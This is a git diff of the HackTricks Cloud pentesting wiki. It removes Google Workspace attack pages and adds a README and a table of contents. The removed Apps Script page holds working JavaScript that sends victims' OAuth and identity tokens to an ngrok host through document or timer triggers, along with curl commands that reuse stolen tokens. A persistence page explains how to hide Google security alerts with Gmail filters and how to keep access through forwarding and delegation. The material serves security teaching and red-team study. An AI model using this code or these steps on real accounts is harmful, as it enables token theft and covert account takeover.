- -Create a standalone project using the clasp command line tool - -`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal. - -See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details. - -
- -## App Script Scenario - -### Create Google Sheet with App Script - -Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**. - -### Leak token - -In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**: - -* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions) -* **Gmail**: To access gmail data -* **Drive**: To access drive data -* **Google Sheets API**: So it works with the trigger - -To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.** - -{% code overflow="wrap" %} -```javascript -function getToken() { - var userEmail = Session.getActiveUser().getEmail(); - var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1); - var oauthToken = ScriptApp.getOAuthToken(); - var identityToken = ScriptApp.getIdentityToken(); - - // Data json - data = { - "oauthToken": oauthToken, - "identityToken": identityToken, - "email": userEmail, - "domain": domain - } - - // Send data - makePostRequest(data); - - // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions - - // To ask for AdminDirectory permissions - var pageToken = ""; - page = AdminDirectory.Users.list({ - domain: domain, // Use the extracted domain - orderBy: 'givenName', - maxResults: 100, - pageToken: pageToken - }); - - // To ask for gmail permissions - var threads = GmailApp.getInboxThreads(0, 10); - - // To ask for drive permissions - var files = DriveApp.getFiles(); -} - - -function makePostRequest(data) { - var url = 'http://5.tcp.eu.ngrok.io:12027'; - - var options = { - 'method' : 'post', - 'contentType': 'application/json', - 'payload' : JSON.stringify(data) - }; - - try { - UrlFetchApp.fetch(url, options); - } catch (e) { - Logger.log("Error making POST request: " + e.toString()); - } -} -``` -{% endcode %} - -To capture the request you can just run: - -```bash -ngrok tcp 4444 -nc -lv 4444 #macOS -``` - -Permissions requested to execute the App Script: - -
- -{% hint style="warning" %} -As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**. -{% endhint %} - -### Create Trigger - -Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save. - -Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something. - -### Sharing - -In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**. - -{% hint style="success" %} -The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users. -{% endhint %} - -### Abusing Shared With Me documents - -{% hint style="danger" %} -If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created). - -A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?) -{% endhint %} - -{% hint style="success" %} -If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created. -{% endhint %} - -### Copying instead of sharing - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:** - -
- -If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**. - -### Sharing as Web Application - -Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear: - -
- -Followed by the **typical OAuth prompt asking** for the needed permissions. - -### Testing - -You can test a gathered token to list emails with: - -{% code overflow="wrap" %} -```bash -curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \ --H "Authorization: Bearer " -``` -{% endcode %} - -List calendar of the user: - -```bash -curl -H "Authorization: Bearer $OAUTH_TOKEN" \ - -H "Accept: application/json" \ - "https://www.googleapis.com/calendar/v3/users/me/calendarList" -``` - -## App Script as Persistence - -One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.** - -It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**: - -Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you: - -
- -{% hint style="danger" %} -This will create a security alert email and a push message to your mobile alerting about this. -{% endhint %} - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. -{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags). -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md deleted file mode 100644 index d4b446fd1..000000000 --- a/pentesting-cloud/workspace-security/gws-persistence.md +++ /dev/null @@ -1,210 +0,0 @@ -# GWS - Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -{% hint style="danger" %} -All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account. -{% endhint %} - -## **Persistence in Gmail** - -* You can create **filters to hide** security notifications from Google - * `from: (no-reply@accounts.google.com) "Security Alert"` - * This will prevent security emails to reach the email (but won't prevent push notifications to the mobile) - -
- -Steps to create a gmail filter - -(Instructions from [**here**](https://support.google.com/mail/answer/6579)) - -1. Open [Gmail](https://mail.google.com/). -2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) . -3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**. -4. At the bottom of the search window, click **Create filter**. -5. Choose what you’d like the filter to do. -6. Click **Create filter**. - -Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters) - -
- -
- -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop) - * The receiving address will need to confirm this - * Then, set to forward all the emails while keeping a copy (remember to click on save changes): - -
- -It's also possible create filters and forward only specific emails to the other email address. - -## App passwords - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.** - -**Even if you have an open session you will need to know the password of the user to create an app password.** - -{% hint style="info" %} -App passwords can **only be used with accounts that have 2-Step Verification** turned on. -{% endhint %} - -## Change 2-FA and similar - -It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\ -**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).** - -{% hint style="danger" %} -To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here. - -It's also possible to **locate the device.** -{% endhint %} - -**Even if you have an open session you will need to know the password of the user to change these settings.** - -## Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\ -It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -Check the following page for more information about OAuth Apps: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -## Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled). - -
- -If you are a Workspace admin check this to enable the feature - -(Information [copied form the docs](https://support.google.com/a/answer/7223765)) - -As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can: - -* Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf. -* Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account. - -Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit. - -#### Delegation limits & restrictions - -* **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account. -* With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number. -* Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently. -* A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit. -* Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609). - -#### Step 1: Turn on Gmail delegation for your users - -**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584). - -1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076). - - Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com -2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**. -3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584). -4. Click **Mail delegation**. -5. Check the **Let users delegate access to their mailbox to other users in the domain** box. -6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box. -7. Select an option for the default sender information that's included in messages sent by delegates: - * **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate. - * **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included. -8. (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box. -9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings. -10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9. - -Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107) - -#### Step 2: Have users set up delegates for their accounts - -After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user. - -For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350). - -
- -
- -From a regular suer, check here the instructions to try to delegate your access - -(Info copied [**from the docs**](https://support.google.com/mail/answer/138350)) - -You can add up to 10 delegates. - -If you're using Gmail through your work, school, or other organization: - -* You can add up to 1000 delegates within your organization. -* With typical use, 40 delegates can access a Gmail account at the same time. -* If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time. - -1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app. -2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**. -3. Click the **Accounts and Import** or **Accounts** tab. -4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin. - * If you don't see Grant access to your account, then it's restricted. -5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\ - \ - **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in. - - * [Learn how an Admin can create a user](https://support.google.com/a/answer/33310). - * [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319). - - 6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**. - - The person you added will get an email asking them to confirm. The invitation expires after a week. - - If you added a group, all group members will become delegates without having to confirm. - - Note: It may take up to 24 hours for the delegation to start taking effect. - -
- -## Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone. - -## **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check: - -{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %} -[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md) -{% endcontent-ref %} - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md deleted file mode 100644 index 30bbf4d6a..000000000 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md +++ /dev/null @@ -1,87 +0,0 @@ -# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCPW - Google Credential Provider for Windows - -This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcpw-google-credential-provider-for-windows.md" %} -[gcpw-google-credential-provider-for-windows.md](gcpw-google-credential-provider-for-windows.md) -{% endcontent-ref %} - -## GCSD - Google Cloud Directory Sync - -This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing). - -It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcds-google-cloud-directory-sync.md" %} -[gcds-google-cloud-directory-sync.md](gcds-google-cloud-directory-sync.md) -{% endcontent-ref %} - -## GPS - Google Password Sync - -This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google. - -It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running). - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gps-google-password-sync.md" %} -[gps-google-password-sync.md](gps-google-password-sync.md) -{% endcontent-ref %} - -## Admin Directory Sync - -The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -Find more information about this in: - -{% content-ref url="gws-admin-directory-sync.md" %} -[gws-admin-directory-sync.md](gws-admin-directory-sync.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/src/README.md b/src/README.md new file mode 100644 index 000000000..e8b2b0355 --- /dev/null +++ b/src/README.md @@ -0,0 +1,36 @@ +# HackTricks Cloud + +Reading time: {{ #reading_time }} + +{{#include ./banners/hacktricks-training.md}} + +
+ +_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ + +> [!TIP] +> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. + +### **Pentesting CI/CD Methodology** + +**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** + +[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) + +### Pentesting Cloud Methodology + +**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** + +[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) + +### License & Disclaimer + +**Check them in:** + +[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) + +### Github Stats + +![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) + +{{#include ./banners/hacktricks-training.md}} diff --git a/src/SUMMARY.md b/src/SUMMARY.md new file mode 100644 index 000000000..f3c2f74f8 --- /dev/null +++ b/src/SUMMARY.md @@ -0,0 +1,503 @@ +# SUMMARY.md + +# 👽 Welcome! + +- [HackTricks Cloud](README.md) +- [About the Author$$external:https://book.hacktricks.xyz/welcome/about-the-author$$]() +- [HackTricks Values & faq$$external:https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq$$]() + +# 🏭 Pentesting CI/CD + +- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) +- [Github Security](pentesting-ci-cd/github-security/README.md) + - [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) + - [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) + - [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) + - [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) + - [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) + - [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) +- [Gitea Security](pentesting-ci-cd/gitea-security/README.md) + - [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) +- [Concourse Security](pentesting-ci-cd/concourse-security/README.md) + - [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) + - [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) + - [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) +- [CircleCI Security](pentesting-ci-cd/circleci-security.md) +- [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) + - [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) +- [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) + - [Basic Jenkins Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) + - [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) + - [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) + - [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) + - [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) + - [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) +- [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) + - [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) + - [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) +- [Terraform Security](pentesting-ci-cd/terraform-security.md) +- [Atlantis Security](pentesting-ci-cd/atlantis-security.md) +- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) + - [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) + - [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) +- [Okta Security](pentesting-ci-cd/okta-security/README.md) + - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) +- [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) +- [Supabase Security](pentesting-ci-cd/supabase-security.md) +- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) +- [Vercel Security](pentesting-ci-cd/vercel-security.md) +- [TODO](pentesting-ci-cd/todo.md) + +# ⛈️ Pentesting Cloud + +- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) +- [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md) + - [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) + - [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) + - [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) + - [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) + - [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) + - [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) + - [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) + - [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) + - [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) + - [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) + - [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) + - [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) + - [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) + - [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) + - [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) + - [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) + - [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) + - [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) + - [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) + - [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) + - [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) +- [GCP Pentesting](pentesting-cloud/gcp-security/README.md) + - [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) + - [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) + - [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) + - [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) + - [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) + - [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) + - [GCP - Cloud Build Post 